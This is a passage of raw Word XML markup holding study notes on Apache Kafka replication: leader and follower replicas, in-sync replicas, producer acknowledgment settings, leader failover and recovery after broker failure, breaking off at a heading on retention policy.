    </w:p>
    <w:p w14:paraId="65A9B79E" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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2. Leader and Follower Replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF616FE" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by having one replica act as the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while the others are </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>followers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The leader is responsible for all read and write operations, while the followers replicate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCEC03" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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eader Replica</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The leader is the main replica that handles both reads and writes for the partition. When a producer sends data to Kafka, the leader replica receives the messages and appends them to the partition log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56EB7B" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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Follower Replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The follower replicas replicate the data from the leader. They only serve read requests if the leader becomes unavailable. Followers are kept in sync with the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494B6F4" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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3. Replication Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BB6CA" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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hen a producer sends a message to Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E01881" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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he message is first written to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader replica</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311904C0" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> then asynchronously replicates the message to its </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D80534" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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e followers fetch data from the leader and keep their logs in sync with the leader’s log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C725C" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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his asynchronous replication ensures that Kafka can handle write-heavy workloads, but it introduces a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., followers may not be fully caught up with the leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CBFE6E" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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4. In-Sync Replicas (ISR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC6E9F" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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o ensure data consistency and reliability, Kafka maintains a concept called </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In-Sync Replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ISR). The ISR is the set of replicas that are fully caught up with the leader and are synchronized. A partition is only considered </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it has at least one replica in the ISR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C8722" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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f a follower falls behind the leader (i.e., it hasn't replicated the data within a certain time window), it is removed from the ISR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8D943" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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f the leader’s replica becomes unavailable, one of the in-sync followers is promoted to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373C07C" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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ensures that only in-sync replicas can be promoted to the leader role, ensuring consistency across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC2ED0" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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5. Replication Acknowledgments (acks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CAC44" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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allows configuring the acknowledgment behavior for producers. The acks setting controls how many replicas must acknowledge a write before the producer considers it successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B98A36" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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acks=0</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer does not wait for any acknowledgment. The message is sent to Kafka but there’s no guarantee that the message was written to the brokers or replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F82DD5" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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lastRenderedPageBreak/>
        <w:t>acks=1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for the leader replica to acknowledge the message. If the leader fails before the message is replicated, the message may be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0313A7" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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acks=all (or acks=-1)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for all replicas (i.e., all in-sync replicas) to acknowledge the message before considering it successfully written. This guarantees that the message is fully replicated and is not lost, even if the leader fails immediately after acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A15CE40" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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6. Leader Failover and Partition Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964C42" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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If the broker hosting the leader replica fails or becomes unavailable, Kafka automatically promotes one of the in-sync follower replicas to become the new leader. This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8661B" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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ensures that at least one replica is in-sync and can take over the leader role to ensure data availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71E377" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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After the leader failover, the new leader continues to serve read and write requests, and Kafka will rebalance the partition assignments to ensure optimal distribution of partitions and replicas across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053014EA" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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7. Replication and Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F0FD4" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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can withstand broker failures if the replication factor is greater than 1. Even if one broker fails, as long as there are in-sync replicas available, Kafka can continue to serve data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F020C" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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inISR</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows configuration of the minimum number of in-sync replicas (min.insync.replicas). If the number of in-sync replicas falls below this threshold, the partition becomes unavailable for writes to prevent data inconsistency. This ensures that there are always enough replicas to guarantee fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E4B84" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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8. How Kafka Handles Data Loss in Case of Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953F9E5" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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s replication mechanism ensures that data is not lost in case of failures by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A69218" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Ensuring that multiple copies of data exist across different brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F7CA2" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Allowing consumers to read from any replica, even if the leader fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D2B7D" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Replicating the data asynchronously but ensuring that there are </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-sync replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A560A" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Offering </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acknowledgment settings</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow producers to ensure data is reliably written and replicated before acknowledging the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE3B298" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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9. Data Recovery After Broker Failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19475FE4" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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hen a broker fails, Kafka will automatically recover from the failure by reassigning leadership for the partitions hosted on that broker. This reassignment happens based on the in-sync replica set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62366C3E" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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f a partition had more than one replica (with replication factor &gt; 1), one of the in-sync replicas is promoted to the new leader. The system can then continue to process messages without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE36C20" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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Summary of Kafka Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7ED28" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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plication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines how many copies of each partition are stored across the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11CFB9" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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eader and Follower</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each partition has one leader and one or more followers to ensure fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AF541" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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n-Sync Replicas (ISR)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only replicas that are fully caught up with the leader can be considered for promoting to the leader role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F7AA1" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Acknowledgment (acks)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer can choose different levels of acknowledgment to guarantee message durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59905F48" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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eader Failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the leader fails, Kafka promotes one of the in-sync followers to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A44379" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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ata Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka ensures data availability and consistency by handling partition leader elections and ensuring replicas are synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD252A" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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By utilizing these mechanisms, Kafka achieves </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</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high availability</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data consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across a distributed system, ensuring that data is reliably replicated and can survive failures without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FAFF2" w14:textId="3FA7ABC4" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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E0562AF">
          <v:rect id="_x0000_i3161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942951D" w14:textId="1FD35593" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="785" w:name="_Toc196308265"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the retention policy in Kafka, and how can it be configured</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
